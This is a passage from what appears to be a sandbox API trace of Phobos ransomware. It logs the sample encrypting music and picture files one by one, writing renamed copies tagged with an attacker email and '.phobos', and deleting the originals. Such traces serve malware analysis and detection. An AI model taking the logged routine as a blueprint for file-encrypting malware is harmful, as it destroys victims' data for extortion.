phKey=0x2a0fac0*=0xa32ce8) returned 1 [0198.652] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.652] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0198.652] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.652] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0198.652] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.652] CloseHandle (hObject=0x16c) returned 1 [0198.652] CloseHandle (hObject=0x178) returned 1 [0198.652] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\s_BQB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\s_bqb.m4a")) returned 1 [0198.653] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\kQlXuy0oL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\kqlxuy0ol.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.654] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=25168) returned 1 [0198.654] CloseHandle (hObject=0x178) returned 1 [0198.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\kQlXuy0oL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\kqlxuy0ol.m4a")) returned 0x20 [0198.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\kQlXuy0oL.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\kqlxuy0ol.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\kQlXuy0oL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\kqlxuy0ol.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.654] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.654] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\kQlXuy0oL.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\kqlxuy0ol.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.748] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32b68) returned 1 [0198.748] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.748] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6250, lpOverlapped=0x0) returned 1 [0198.824] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6260, dwBufLen=0x6260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6260) returned 1 [0198.824] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6260, lpOverlapped=0x0) returned 1 [0198.826] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0198.826] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.826] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0198.826] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.826] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0198.826] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.826] CloseHandle (hObject=0x178) returned 1 [0198.826] CloseHandle (hObject=0x140) returned 1 [0198.826] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\V7ey\\kQlXuy0oL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\v7ey\\kqlxuy0ol.m4a")) returned 1 [0198.827] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\aYcpxr-H-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\aycpxr-h-.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.927] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=57089) returned 1 [0198.927] CloseHandle (hObject=0x178) returned 1 [0198.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\aYcpxr-H-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\aycpxr-h-.bmp")) returned 0x20 [0198.927] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\aYcpxr-H-.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\aycpxr-h-.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\aYcpxr-H-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\aycpxr-h-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.927] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.927] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\aYcpxr-H-.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\aycpxr-h-.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.928] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.928] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.928] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdf01, lpOverlapped=0x0) returned 1 [0198.930] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xdf10, dwBufLen=0xdf10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xdf10) returned 1 [0198.930] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xdf10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xdf10, lpOverlapped=0x0) returned 1 [0198.932] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0198.932] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.932] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0198.932] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.932] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0198.932] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.932] CloseHandle (hObject=0x178) returned 1 [0198.933] CloseHandle (hObject=0x160) returned 1 [0198.933] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\aYcpxr-H-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\aycpxr-h-.bmp")) returned 1 [0198.935] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\_paWYJrw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\_pawyjrw.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.935] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=20398) returned 1 [0198.935] CloseHandle (hObject=0x160) returned 1 [0198.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\_paWYJrw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\_pawyjrw.gif")) returned 0x20 [0198.936] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\_paWYJrw.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\_pawyjrw.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\_paWYJrw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\_pawyjrw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.936] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.936] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\_paWYJrw.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\_pawyjrw.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.937] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.937] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.937] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4fae, lpOverlapped=0x0) returned 1 [0198.939] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4fb0, dwBufLen=0x4fb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4fb0) returned 1 [0198.939] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4fb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4fb0, lpOverlapped=0x0) returned 1 [0198.940] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0198.940] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.940] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0198.940] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.940] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0198.940] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.940] CloseHandle (hObject=0x160) returned 1 [0198.940] CloseHandle (hObject=0x178) returned 1 [0198.940] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\_paWYJrw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\_pawyjrw.gif")) returned 1 [0198.941] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\fKsV2KBu6bxqG3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\fksv2kbu6bxqg3.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.943] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=92056) returned 1 [0198.943] CloseHandle (hObject=0x178) returned 1 [0198.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\fKsV2KBu6bxqG3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\fksv2kbu6bxqg3.png")) returned 0x20 [0198.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\fKsV2KBu6bxqG3.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\fksv2kbu6bxqg3.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\fKsV2KBu6bxqG3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\fksv2kbu6bxqg3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.943] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.943] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\fKsV2KBu6bxqG3.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\fksv2kbu6bxqg3.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.944] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.944] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.944] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16798, lpOverlapped=0x0) returned 1 [0198.946] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x167a0, dwBufLen=0x167a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x167a0) returned 1 [0198.947] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x167a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x167a0, lpOverlapped=0x0) returned 1 [0198.948] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0198.948] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.948] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.948] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.948] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.949] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.949] CloseHandle (hObject=0x178) returned 1 [0198.949] CloseHandle (hObject=0x160) returned 1 [0198.949] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\fKsV2KBu6bxqG3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\fksv2kbu6bxqg3.png")) returned 1 [0198.950] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\gyEMvXd57lwngR3S.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\gyemvxd57lwngr3s.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.951] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=93035) returned 1 [0198.951] CloseHandle (hObject=0x160) returned 1 [0198.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\gyEMvXd57lwngR3S.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\gyemvxd57lwngr3s.gif")) returned 0x20 [0198.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\gyEMvXd57lwngR3S.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\gyemvxd57lwngr3s.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\gyEMvXd57lwngR3S.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\gyemvxd57lwngr3s.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.951] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.951] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\gyEMvXd57lwngR3S.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\gyemvxd57lwngr3s.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.952] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.952] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.952] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16b6b, lpOverlapped=0x0) returned 1 [0198.992] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16b70, dwBufLen=0x16b70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16b70) returned 1 [0198.993] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16b70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16b70, lpOverlapped=0x0) returned 1 [0198.995] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa329e8) returned 1 [0198.995] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.995] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0198.995] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.995] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0198.995] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.995] CloseHandle (hObject=0x160) returned 1 [0198.995] CloseHandle (hObject=0x178) returned 1 [0198.995] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mRIEH\\gyEMvXd57lwngR3S.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mrieh\\gyemvxd57lwngr3s.gif")) returned 1 [0198.996] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 